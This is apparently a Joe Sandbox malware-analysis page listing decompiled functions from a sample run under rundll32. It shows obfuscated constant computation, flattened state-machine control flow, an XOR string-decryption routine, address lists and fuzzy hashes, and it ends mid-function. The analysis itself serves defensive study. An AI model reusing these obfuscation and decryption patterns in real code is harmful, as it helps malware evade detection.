			E002561B8(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t64;
				void* _t68;
				void* _t69;
				signed int _t71;
				void* _t75;
				void* _t76;
				signed int* _t78;

				_t78 =  &_v24;
				_v12 = 0x5dfc;
				_v12 = _v12 * 0x23;
				_t69 = __ecx;
				_v12 = _v12 << 7;
				_t75 = 0;
				_v12 = _v12 ^ 0x066cb215;
				_t76 = 0x1b4ca438;
				_v24 = 0xd6f7;
				_v24 = _v24 + 0xffffb773;
				_v24 = _v24 + 0xd9f1;
				_v24 = _v24 + 0xe528;
				_v24 = _v24 ^ 0x000200e6;
				_v16 = 0x64b4;
				_v16 = _v16 + 0xda3f;
				_v16 = _v16 >> 1;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0x0000725d;
				_v4 = 0xc8c2;
				_v4 = _v4 | 0x9945d150;
				_v4 = _v4 + 0x9caf;
				_v4 = _v4 ^ 0x99461e9f;
				_v20 = 0xe019;
				_t71 = 0x46;
				_v20 = _v20 / _t71;
				_v20 = _v20 >> 0xd;
				_v20 = _v20 >> 4;
				_v20 = _v20 ^ 0x00001f6d;
				_v8 = 0xf95b;
				_v8 = _v8 | 0x30645c78;
				_v8 = _v8 + 0xffff8663;
				_v8 = _v8 ^ 0x3064d0a8;
				do {
					while(_t76 != 0x108726d) {
						if(_t76 == 0x1b4ca438) {
							_t76 = 0x2a486598;
							continue;
						} else {
							if(_t76 == 0x2a486598) {
								_push(_t71);
								_t68 = E00257F1B();
								_t78 =  &(_t78[1]);
								_t76 = 0x108726d;
								_t75 = _t75 + _t68;
								continue;
							}
						}
						goto L7;
					}
					_t71 = _v16;
					_t64 = E0024D64E(_t71, _v4, _v20, _t69 + 4, _v8);
					_t78 =  &(_t78[3]);
					_t76 = 0xee7d46d;
					_t75 = _t75 + _t64;
					L7:
				} while (_t76 != 0xee7d46d);
				return _t75;
			}

0x002561b8
0x002561bb
0x002561ce
0x002561d2
0x002561d4
0x002561d9
0x002561db
0x002561e3
0x002561e8
0x002561f5
0x002561fd
0x00256205
0x0025620d
0x00256215
0x0025621d
0x00256225
0x00256229
0x0025622e
0x00256236
0x0025623e
0x00256246
0x0025624e
0x00256256
0x00256264
0x00256267
0x0025626b
0x00256270
0x00256275
0x0025627d
0x00256285
0x0025628d
0x00256295
0x0025629d
0x0025629d
0x002562ab
0x002562cb
0x00000000
0x002562ad
0x002562af
0x002562b9
0x002562ba
0x002562bf
0x002562c2
0x002562c7
0x00000000
0x002562c7
0x002562af
0x00000000
0x002562ab
0x002562df
0x002562e3
0x002562e8
0x002562eb
0x002562f0
0x002562f2
0x002562f2
0x00256303

Strings

]r, xrefs: 0025622E
(, xrefs: 00256205
x\d0, xrefs: 00256285

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ($]r$x\d0
API String ID: 0-3053701899
Opcode ID: 51c1d68f1b448b9cd01a0670611b7d4582907cb0fec310406faa2fe7817289f3
Instruction ID: d52b58f4002e07d3a6e5dbf8dc7a1d22ef042eacce058314457d39f5576098e5
Opcode Fuzzy Hash: 51c1d68f1b448b9cd01a0670611b7d4582907cb0fec310406faa2fe7817289f3
Instruction Fuzzy Hash: 1A3184B28083428FD304DE14D88901BBBE0BBE4718F404E5DF899A7261D3B9CE1C8B97

Uniqueness

Uniqueness Score: -1.00%

Function 00250B68, Relevance: 3.8, Strings: 3, Instructions: 75
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E00250B68(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* _t76;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t76);
				_v16 = 0x6860;
				_v16 = _v16 * 0x5b;
				_v16 = _v16 ^ 0xdc6b4abd;
				_v16 = _v16 ^ 0xdc4e778c;
				_v32 = 0xa230;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0x288c6565;
				_v8 = 0xfe44;
				_v8 = _v8 | 0x4c3583fb;
				_v8 = _v8 + 0xfffff685;
				_v8 = _v8 ^ 0x61a5c761;
				_v8 = _v8 ^ 0x2d906c10;
				_v40 = 0xe5db;
				_v40 = _v40 | 0x9b65f6ba;
				_v40 = _v40 ^ 0x9b65d356;
				_v20 = 0x9adf;
				_v20 = _v20 + 0x49d9;
				_v20 = _v20 + 0xffff68ea;
				_v20 = _v20 ^ 0x00005968;
				_v36 = 0x94a7;
				_v36 = _v36 ^ 0xf3da6fb3;
				_v36 = _v36 ^ 0xf3dae7d2;
				_v28 = 0xd25a;
				_v28 = _v28 + 0x1e41;
				_v28 = _v28 | 0x2f85fa9d;
				_v28 = _v28 ^ 0x2f85d3ee;
				_v12 = 0x5326;
				_v12 = _v12 ^ 0x0ede0c0e;
				_v12 = _v12 >> 7;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0x01db8a0a;
				_v24 = 0x6b2;
				_v24 = _v24 << 4;
				_v24 = _v24 | 0x9aa17d8a;
				_t63 =  &_v24;
				_v24 = _v24 ^ 0x9aa13f42;
				_push(_v32);
				_t91 = E0025889D(0x25c0b0, _v16,  *_t63);
				E0024C680(__ecx, _v40, _v20, 0x25c0b0, _v36, _a12, _t79, _a4);
				return E00252025(_v28, _t91, _v12, _v24);
			}

0x00250b70
0x00250b75
0x00250b78
0x00250b7b
0x00250b7c
0x00250b7d
0x00250b82
0x00250b92
0x00250b95
0x00250b9c
0x00250ba3
0x00250baa
0x00250bae
0x00250bb5
0x00250bbc
0x00250bc3
0x00250bca
0x00250bd1
0x00250bd8
0x00250bdf
0x00250be6
0x00250bed
0x00250bf4
0x00250bfb
0x00250c02
0x00250c09
0x00250c10
0x00250c17
0x00250c1e
0x00250c25
0x00250c2c
0x00250c33
0x00250c3a
0x00250c41
0x00250c48
0x00250c4c
0x00250c50
0x00250c57
0x00250c5e
0x00250c62
0x00250c69
0x00250c69
0x00250c70
0x00250c7e
0x00250c96
0x00250cb3

Strings

&S, xrefs: 00250C3A
hY, xrefs: 00250C02
`h, xrefs: 00250B82

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &S$`h$hY
API String ID: 0-860638928
Opcode ID: 49fa3babc41eb602bf01edb783f4afcf5fa581be559c1510a993e40191de345b
Instruction ID: 9d73979509b92fc41db7756b4c3371493649b1f22c47da6a621c5c30d1b351dd
Opcode Fuzzy Hash: 49fa3babc41eb602bf01edb783f4afcf5fa581be559c1510a993e40191de345b
Instruction Fuzzy Hash: 813120B1C00209EBDF49CFA1C94A8EEBFB5FB44314F208158E41276260D3B54A69CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 10007F07, Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10007F07(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}

0x10007f0c
0x10007f1c

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 10007F0C
UnhandledExceptionFilter.KERNEL32(?), ref: 10007F15

Memory Dump Source

Source File: 00000007.00000002.2109745259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2109727549.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109828341.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109839027.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2109852772.0000000010015000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f7c80f92ea83676b0d4ae0fb41d7acd9273c55ff761cf0af19de4335131d4f5f
Instruction ID: 7be572de92686af6165e4848987e7b2d669c1521723c7f37aea2a3297de6ad46
Opcode Fuzzy Hash: f7c80f92ea83676b0d4ae0fb41d7acd9273c55ff761cf0af19de4335131d4f5f
Instruction Fuzzy Hash: BAB09231044218BBEA003B91DC49BCC3F29EB056A2F004012F60D44064CF6256508AA1

Uniqueness

Uniqueness Score: -1.00%

Function 00255A61, Relevance: 2.7, Strings: 2, Instructions: 155
COMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E00255A61(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				void* __ecx;
				void* _t115;
				signed int _t129;
				void* _t136;
				void* _t156;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				signed int* _t163;

				_push(_a16);
				_t156 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0024602B(_t115);
				_v564 = 0x4767;
				_t163 =  &(( &_v600)[6]);
				_v564 = _v564 << 9;
				_v564 = _v564 ^ 0x008e895f;
				_t136 = 0x30c826c8;
				_v588 = 0x30cc;
				_v588 = _v588 + 0x4702;
				_t157 = 0x63;
				_v588 = _v588 / _t157;
				_v588 = _v588 + 0xb80e;
				_v588 = _v588 ^ 0x0000cf36;
				_v596 = 0xadf;
				_t158 = 0x66;
				_v596 = _v596 * 0x61;
				_v596 = _v596 / _t158;
				_t159 = 0x4c;
				_v596 = _v596 / _t159;
				_v596 = _v596 ^ 0x0000541c;
				_v592 = 0x64b0;
				_v592 = _v592 * 0x15;
				_v592 = _v592 + 0xa35f;
				_v592 = _v592 >> 0xe;
				_v592 = _v592 ^ 0x0000251e;
				_v600 = 0x3c82;
				_v600 = _v600 | 0xdba50be5;
				_v600 = _v600 ^ 0x0661176e;
				_v600 = _v600 + 0x2491;
				_v600 = _v600 ^ 0xddc40dba;
				_v572 = 0x6631;
				_v572 = _v572 + 0xffff287e;
				_v572 = _v572 + 0x2e34;
				_v572 = _v572 ^ 0xffff8a80;
				_v584 = 0x3cf9;
				_v584 = _v584 ^ 0x209cd78c;
				_v584 = _v584 ^ 0x88ea975c;
				_v584 = _v584 | 0x088f8ebb;
				_v584 = _v584 ^ 0xa8ffe4fe;
				_v560 = 0x5a99;
				_v560 = _v560 << 2;
				_v560 = _v560 ^ 0x0001627e;
				_v576 = 0xc549;
				_v576 = _v576 * 0x36;
				_v576 = _v576 + 0xffff72cb;
				_v576 = _v576 ^ 0x00296382;
				_v568 = 0xc477;
				_v568 = _v568 + 0xffff852d;
				_v568 = _v568 ^ 0x00000bf7;
				_t160 = _v568;
				_v580 = 0xe5ab;
				_v580 = _v580 + 0x26f9;
				_v580 = _v580 + 0xffffb6c9;
				_v580 = _v580 ^ 0x0000c36f;
				do {
					while(_t136 != 0x96b3cdc) {
						if(_t136 == 0xc60f3b0) {
							_t129 = E00259AC7(_v572, _v584,  &_v556, _v560, _t160);
							_t163 =  &(_t163[3]);
							L11:
							asm("sbb ecx, ecx");
							_t136 = ( ~_t129 & 0xe09a757b) + 0x28d0c761;
							continue;
						}
						if(_t136 == 0x1f7f9ad4) {
							_v556 = 0x22c;
							_t129 = E002476F7( &_v556, _v592, _v600, _t160);
							goto L11;
						}
						if(_t136 == 0x28d0c761) {
							return E00254F7D(_v576, _v568, _t160);
						}
						if(_t136 != 0x2dc3f3d6) {
							if(_t136 != 0x30c826c8) {
								goto L16;
							} else {
								_t136 = 0x2dc3f3d6;
								continue;
							}
							L19:
							return _t129;
						}
						_t129 = E00241C88(_t136, _t136, _v580);
						_t160 = _t129;
						_t163 =  &(_t163[3]);
						if(_t129 != 0xffffffff) {
							_t136 = 0x1f7f9ad4;
							continue;
						}
						goto L19;
					}
					_push(_t156);
					_push( &_v556);
					if(_a4() == 0) {
						_t136 = 0x28d0c761;
						goto L16;
					} else {
						_t136 = 0xc60f3b0;
						continue;
					}
					goto L19;
					L16:
				} while (_t136 != 0x22b9bf83);
				return _t129;
			}

0x00255a6b
0x00255a72
0x00255a74
0x00255a7b
0x00255a82
0x00255a89
0x00255a8b
0x00255a90
0x00255a98
0x00255a9b
0x00255aa2
0x00255aaa
0x00255aaf
0x00255abc
0x00255acf
0x00255ad4
0x00255ada
0x00255ae2
0x00255aea
0x00255af7
0x00255afa
0x00255b06
0x00255b0e
0x00255b11
0x00255b15
0x00255b1d
0x00255b2a
0x00255b2e
0x00255b36
0x00255b3b
0x00255b43
0x00255b4b
0x00255b53
0x00255b5b
0x00255b63
0x00255b6b
0x00255b73
0x00255b7b
0x00255b83
0x00255b8b
0x00255b93
0x00255b9b
0x00255ba3
0x00255bab
0x00255bb3
0x00255bbb
0x00255bc0
0x00255bc8
0x00255bd5
0x00255bd9
0x00255be1
0x00255be9
0x00255bf1
0x00255bf9
0x00255c01
0x00255c05
0x00255c0d
0x00255c15
0x00255c1d
0x00255c25
0x00255c25
0x00255c33
0x00255cd1
0x00255cd6
0x00255cac
0x00255cb0
0x00255cb8
0x00000000
0x00255cb8
0x00255c3f
0x00255c9d
0x00255ca5
0x00000000
0x00255cab
0x00255c43
0x00000000
0x00255d11
0x00255c4f
0x00255c57
0x00000000
0x00255c5d
0x00255c5d
0x00000000
0x00255c5d
0x00255d1c
0x00255d1c
0x00255d1c
0x00255c76
0x00255c7b
0x00255c7d
0x00255c83
0x00255c89
0x00000000
0x00255c89
0x00000000
0x00255c83
0x00255cdb
0x00255ce0
0x00255cea
0x00255cf3
0x00000000
0x00255cec
0x00255cec
0x00000000
0x00255cec
0x00000000
0x00255cf5
0x00255cf5
0x00000000

Strings

4., xrefs: 00255B7B
gG, xrefs: 00255A90

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: 4.$gG
API String ID: 2962429428-791606841
Opcode ID: c2f05fb42b6ff04c4c7a9286f8ef30f30c4201f765be1d6751a13ce882cf6e31
Instruction ID: 376712ba590d1c4c66ac57a7d5af39554ead28240498d9b00c9772e6b84d33a2
Opcode Fuzzy Hash: c2f05fb42b6ff04c4c7a9286f8ef30f30c4201f765be1d6751a13ce882cf6e31
Instruction Fuzzy Hash: AF61AC711187419BD768CF24C89981FBBE1FBC4319F100A1DF586962A0D775CA59CB8B

Uniqueness

Uniqueness Score: -1.00%

Function 0024B112, Relevance: 2.6, Strings: 2, Instructions: 111
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0024B112() {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				char* _t91;
				void* _t94;
				intOrPtr _t97;
				signed int _t109;
				signed int _t110;
				short* _t113;

				_v524 = _v524 & 0x00000000;
				_v536 = 0x15a9e0;
				_t94 = 0x2447ce85;
				_v532 = 0xcaf76;
				_v528 = 0x42cbc4;
				_v544 = 0x1d8c;
				_v544 = _v544 << 8;
				_v544 = _v544 ^ 0x001dbb75;
				_v564 = 0xb98d;
				_v564 = _v564 * 0x6d;
				_v564 = _v564 | 0xb6682b1a;
				_t109 = 0x16;
				_v564 = _v564 / _t109;
				_v564 = _v564 ^ 0x084aef85;
				_v568 = 0xa53e;
				_v568 = _v568 | 0x3e6d869d;
				_t110 = 0x46;
				_v568 = _v568 * 0x2b;
				_v568 = _v568 ^ 0x7c6b3e02;
				_v540 = 0x49b5;
				_v540 = _v540 + 0xbc03;
				_v540 = _v540 ^ 0x0001452b;
				_v556 = 0x9474;
				_v556 = _v556 << 0xb;
				_v556 = _v556 ^ 0xd8ad9d33;
				_v556 = _v556 ^ 0xdc0e2a5f;
				_v560 = 0x11f0;
				_v560 = _v560 + 0xffffe240;
				_v560 = _v560 + 0xb761;
				_v560 = _v560 ^ 0x000087cb;
				_v548 = 0x2457;
				_v548 = _v548 / _t110;
				_v548 = _v548 ^ 0x000075df;
				do {
					while(_t94 != 0x14e9f4e4) {
						if(_t94 == 0x21e9d2a8) {
							_t97 =  *0x25ca2c; // 0x2c8300
							_t82 = _t97 + 0x230; // 0x77004d
							return E00246636(_t82, _v556, _v560, _v548, _t113);
						}
						if(_t94 == 0x2275b3e1) {
							_t91 = E00253E3F(_t94,  &_v520, __eflags, _v544, _v564);
							_t94 = 0x14e9f4e4;
							continue;
						}
						if(_t94 != 0x2447ce85) {
							goto L15;
						}
						_t94 = 0x2275b3e1;
					}
					_v552 = 0xe342;
					_v552 = _v552 ^ 0x7b193e87;
					_v552 = _v552 ^ 0x7b19ddc7;
					_t113 =  &_v520 + E00250ADC( &_v520, _v568, _v540) * 2;
					while(1) {
						_t91 =  &_v520;
						__eflags = _t113 - _t91;
						if(_t113 <= _t91) {
							break;
						}
						__eflags =  *_t113 - 0x5c;
						if( *_t113 != 0x5c) {
							L10:
							_t113 = _t113 - 2;
							__eflags = _t113;
							continue;
						}
						_t76 =  &_v552;
						 *_t76 = _v552 - 1;
						__eflags =  *_t76;
						if( *_t76 == 0) {
							__eflags = _t113;
							L14:
							_t94 = 0x21e9d2a8;
							goto L15;
						}
						goto L10;
					}
					goto L14;
					L15:
					__eflags = _t94 - 0x318d27d3;
				} while (__eflags != 0);
				return _t91;
			}

0x0024b118
0x0024b11f
0x0024b127
0x0024b12c
0x0024b134
0x0024b13c
0x0024b144
0x0024b149
0x0024b151
0x0024b162
0x0024b16b
0x0024b183
0x0024b188
0x0024b18e
0x0024b196
0x0024b19e
0x0024b1b3
0x0024b1b4
0x0024b1b8
0x0024b1c0
0x0024b1c8
0x0024b1d0
0x0024b1d8
0x0024b1e0
0x0024b1e5
0x0024b1ed
0x0024b1f5
0x0024b1fd
0x0024b205
0x0024b20d
0x0024b215
0x0024b223
0x0024b227
0x0024b233
0x0024b233
0x0024b239
0x0024b2ce
0x0024b2d8
0x00000000
0x0024b2e3
0x0024b241
0x0024b25b
0x0024b262
0x00000000
0x0024b262
0x0024b249
0x00000000
0x00000000
0x0024b24b
0x0024b24b
0x0024b266
0x0024b272
0x0024b27a
0x0024b294
0x0024b2a8
0x0024b2a8
0x0024b2ac
0x0024b2ae
0x00000000
0x00000000
0x0024b299
0x0024b29d
0x0024b2a5
0x0024b2a5
0x0024b2a5
0x00000000
0x0024b2a5
0x0024b29f
0x0024b29f
0x0024b29f
0x0024b2a3
0x0024b2b2
0x0024b2b5
0x0024b2b5
0x00000000
0x0024b2b5
0x00000000
0x0024b2a3
0x00000000
0x0024b2b7
0x0024b2b7
0x0024b2b7
0x00000000

Strings

B, xrefs: 0024B266
W$, xrefs: 0024B215

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: B$W$
API String ID: 0-584637061
Opcode ID: 40148a97ac055a85387f62079681aafa80defe17f16155748efa8d5173861576
Instruction ID: 9f8c6248db263abf97bb80827e5669eae6a597db12d722cbdfb29dfaadff97c4
Opcode Fuzzy Hash: 40148a97ac055a85387f62079681aafa80defe17f16155748efa8d5173861576
Instruction Fuzzy Hash: 094187715183028BD719CF20D58955FBBE1FBC8758F104A1EF489661A0D7B4CA4ACF83

Uniqueness

Uniqueness Score: -1.00%

Function 002531E2, Relevance: 2.6, Strings: 2, Instructions: 102
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E002531E2(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v572;
				intOrPtr* _t106;
				signed int _t110;
				signed int _t111;

				_v52 = 0;
				_v28 = 0x38ff;
				_v28 = _v28 | 0x657975a1;
				_v28 = _v28 ^ 0x65795a60;
				_v36 = 0xb7c2;
				_t110 = 0x62;
				_v36 = _v36 / _t110;
				_v36 = _v36 ^ 0x0000110e;
				_v24 = 0xe00a;
				_v24 = _v24 << 5;
				_v24 = _v24 + 0xffffb393;
				_v24 = _v24 ^ 0x001b9d0d;
				_v20 = 0xfb31;
				_v20 = _v20 + 0xbdbd;
				_v20 = _v20 + 0x1446;
				_v20 = _v20 ^ 0x0001be9a;
				_v40 = 0x7fef;
				_v40 = _v40 >> 1;
				_v40 = _v40 ^ 0x00001ed5;
				_v8 = 0xf1c1;
				_v8 = _v8 << 7;
				_v8 = _v8 + 0x6d97;
				_v8 = _v8 << 9;
				_v8 = _v8 ^ 0xf29c2a73;
				_v32 = 0xb6f2;
				_v32 = _v32 | 0x667f3c4f;
				_v32 = _v32 ^ 0x667f909f;
				_v16 = 0xa641;
				_t111 = 0x3c;
				_v16 = _v16 / _t111;
				_v16 = _v16 >> 7;
				_v16 = _v16 ^ 0x1e480640;
				_v16 = _v16 ^ 0x1e480386;
				_v44 = 0xa73d;
				_v44 = _v44 >> 0xd;
				_v44 = _v44 ^ 0x000057d1;
				_v48 = 0x6a4b;
				_v48 = _v48 << 7;
				_v48 = _v48 ^ 0x00354ae8;
				_v12 = 0x27be;
				_v12 = _v12 ^ 0xc55dd82d;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0xb51d94d3;
				_v12 = _v12 ^ 0x844acffa;
				_t112 = _v28;
				if(E00241210(_v28, _v36, _t111, _v24,  &_v572, _v20) != 0) {
					_t106 =  &_v572;
					if(_v572 != 0) {
						while( *_t106 != 0x5c) {
							_t106 = _t106 + 2;
							if( *_t106 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						_t112 = 0;
						 *((short*)(_t106 + 2)) = 0;
					}
					L6:
					E0025375D(_v40, _t112, _t112,  &_v572, _v8, _v32, _v16, _t112,  &_v52, _v44, _t112, _v48, _t112, _v12);
				}
				return _v52;
			}

0x002531f0
0x002531f3
0x002531fa
0x00253201
0x00253208
0x00253214
0x00253219
0x0025321e
0x00253225
0x0025322c
0x00253230
0x00253237
0x0025323e
0x00253245
0x0025324c
0x00253253
0x0025325a
0x00253261
0x00253264
0x0025326b
0x00253272
0x00253276
0x0025327d
0x00253281
0x00253288
0x0025328f
0x00253296
0x0025329d
0x002532a7
0x002532aa
0x002532b3
0x002532b7
0x002532be
0x002532c5
0x002532cc
0x002532d0
0x002532d7
0x002532de
0x002532e2
0x002532e9
0x002532f0
0x002532f7
0x002532fb
0x00253302
0x00253314
0x00253321
0x00253323
0x00253330
0x00253332
0x00253338
0x0025333e
0x00000000
0x00000000
0x00253340
0x00000000
0x0025333e
0x00253342
0x00253344
0x00253344
0x00253348
0x0025336d
0x00253372
0x0025337c

Strings

J5, xrefs: 002532E2
`Zye, xrefs: 00253201

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: `Zye$J5
API String ID: 0-1569392922
Opcode ID: a18ca0a6be4549facd08cad680643561a0f933ec655d038f342e6083d984c38d
Instruction ID: e99770e887c118af9e6252dcbb2f2b8738ba2f1bf6c7d9a46704ee9f82a24549
Opcode Fuzzy Hash: a18ca0a6be4549facd08cad680643561a0f933ec655d038f342e6083d984c38d
Instruction Fuzzy Hash: AC4114B1C1021DEBDF59CFA0C94A9EEBBB5FB04304F108199E511B62A0D7B94B58CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0025889D, Relevance: 2.6, Strings: 2, Instructions: 101
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E0025889D(signed int* __ecx, void* __edx, void* __eflags) {
				void* _t50;
				signed int _t57;
				signed int _t74;
				signed int _t75;
				signed int _t84;
				unsigned int _t85;
				unsigned int _t86;
				signed int _t93;
				signed int _t94;
				signed int* _t95;
				signed int* _t96;
				signed int _t97;
				signed int _t98;
				unsigned int _t100;
				void* _t106;
				short _t107;
				void* _t108;
				void* _t109;

				_push( *((intOrPtr*)(_t108 + 0x30)));
				_push(__ecx);
				E0024602B(_t50);
				 *((intOrPtr*)(_t108 + 0x30)) = 0x3e4ab4;
				_t95 =  &(__ecx[1]);
				_t107 = 0;
				 *((intOrPtr*)(_t108 + 0x34)) = 0;
				 *(_t108 + 0x24) = 0xc5f8;
				 *(_t108 + 0x24) =  *(_t108 + 0x24) + 0x6051;
				 *(_t108 + 0x24) =  *(_t108 + 0x24) ^ 0x00010c1f;
				 *(_t108 + 0x1c) = 0x21c8;
				_t97 = 0x48;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) / _t97;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) + 0xffffac68;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) ^ 0xffffa2cd;
				 *(_t108 + 0x20) = 0xf93e;
				_t98 = 0xe;
				 *(_t108 + 0x20) =  *(_t108 + 0x20) / _t98;
				 *(_t108 + 0x20) =  *(_t108 + 0x20) ^ 0x00004b7b;
				_t93 =  *__ecx;
				_t96 =  &(_t95[1]);
				_t57 =  *_t95 ^ _t93;
				 *(_t108 + 0x28) = _t93;
				 *(_t108 + 0x2c) = _t57;
				_t32 = _t57 + 1; // 0xf93f
				_t100 =  !=  ? (_t32 & 0xfffffffc) + 4 : _t32;
				_t109 = _t108 + 4;
				_t74 = E00248736(_t100 + _t100);
				 *(_t109 + 0x20) = _t74;
				if(_t74 != 0) {
					_t94 = _t74;
					_t106 =  >  ? 0 :  &(_t96[_t100 >> 2]) - _t96 + 3 >> 2;
					if(_t106 != 0) {
						_t75 =  *(_t109 + 0x1c);
						do {
							_t84 =  *_t96;
							_t96 =  &(_t96[1]);
							_t85 = _t84 ^ _t75;
							 *_t94 = _t85 & 0x000000ff;
							_t94 = _t94 + 8;
							 *((short*)(_t94 - 6)) = _t85 >> 0x00000008 & 0x000000ff;
							_t86 = _t85 >> 0x10;
							_t107 = _t107 + 1;
							 *((short*)(_t94 - 4)) = _t86 & 0x000000ff;
							 *((short*)(_t94 - 2)) = _t86 >> 0x00000008 & 0x000000ff;
						} while (_t107 < _t106);
						_t74 =  *(_t109 + 0x18);
					}
					 *((short*)(_t74 +  *(_t109 + 0x20) * 2)) = 0;
				}
				return _t74;
			}

0x002588a4
0x002588a9
0x002588aa
0x002588af
0x002588b7
0x002588ba
0x002588be
0x002588c2
0x002588ca
0x002588d2
0x002588da
0x002588e8
0x002588ed
0x002588f1
0x002588f9
0x00258901
0x0025890f
0x00258912
0x00258916
0x0025891e
0x00258922
0x00258925
0x00258927
0x0025892b
0x0025892f
0x0025893f
0x0025894a
0x00258959
0x0025895b
0x00258963
0x0025896a
0x0025897b
0x00258980
0x00258982
0x00258986
0x00258986
0x00258988
0x0025898b
0x00258990
0x00258998
0x0025899e
0x002589a2
0x002589ab
0x002589ac
0x002589b3
0x002589b7
0x002589bb
0x002589bb
0x002589c5
0x002589c5
0x002589d2

Strings

{K, xrefs: 00258916
Q`, xrefs: 002588CA

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Q`${K
API String ID: 0-3942002812
Opcode ID: 66a8dc07c374e087d51075cc4997c9489b13b1686e8462a41ad67111226f3164
Instruction ID: 7b12f00da6172b95a01154abd979792f69b0b255c1e76d17d8df0c2dc735bcf7
Opcode Fuzzy Hash: 66a8dc07c374e087d51075cc4997c9489b13b1686e8462a41ad67111226f3164
Instruction Fuzzy Hash: 2031CC72A187128FD314DF29C48446BF7E0FF88318F414B2DE889A7250DB74E90ACB86

Uniqueness

Uniqueness Score: -1.00%

Function 0025878F, Relevance: 2.6, Strings: 2, Instructions: 86
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E0025878F(void* __ecx, void* __edx, void* __eflags) {
